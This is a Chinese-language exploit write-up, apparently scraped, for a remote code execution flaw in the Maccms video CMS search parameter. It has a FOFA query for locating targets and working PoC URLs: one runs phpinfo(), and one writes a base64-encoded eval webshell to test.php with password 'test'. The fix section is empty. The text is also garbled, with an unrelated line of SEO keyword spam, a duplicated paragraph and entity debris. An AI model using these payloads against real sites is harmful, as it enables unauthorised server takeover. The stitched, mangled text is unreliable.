建设商务网站的费用,企业名录2022版,温州教育网站建设,郴州网络推广案例漏洞描述
感谢提供更多信息。“苹果CMS” 似乎是指 “Maccms”#xff0c;这是一款开源的内容管理系统#xff0c;主要用于搭建视频网站。Maccms 提供了一套完整的解决方案#xff0c;包括用户管理、视频上传、分类管理、数据统计等功能#xff0c;使用户能够方便地创建和…漏洞描述
感谢提供更多信息。“苹果CMS” 似乎是指 “Maccms”这是一款开源的内容管理系统主要用于搭建视频网站。Maccms 提供了一套完整的解决方案包括用户管理、视频上传、分类管理、数据统计等功能使用户能够方便地创建和管理自己的视频网站。 搜索页面搜索参数过滤不严 导致直接eval执行PHP语句前台命令执行可getshell
免责声明
技术文章仅供参考任何个人和组织使用网络应当遵守宪法法律遵守公共秩序尊重社会公德不得利用网络从事危害国家安全、荣誉和利益未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失均由使用者本人负责。本文所提供的工具仅用于学习禁止用于其他
资产确定
fofa appmaccms
漏洞复现
poc post 请求
http://ip/index.php?mvod-searchwd{if-A:phpinfo()}{endif-A}aphpinfo()写入网站根目录一句话木马文件payload文件名test.php密码test
http://0-sec.org/index.php?mvod-searchwd{if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A
修复方案
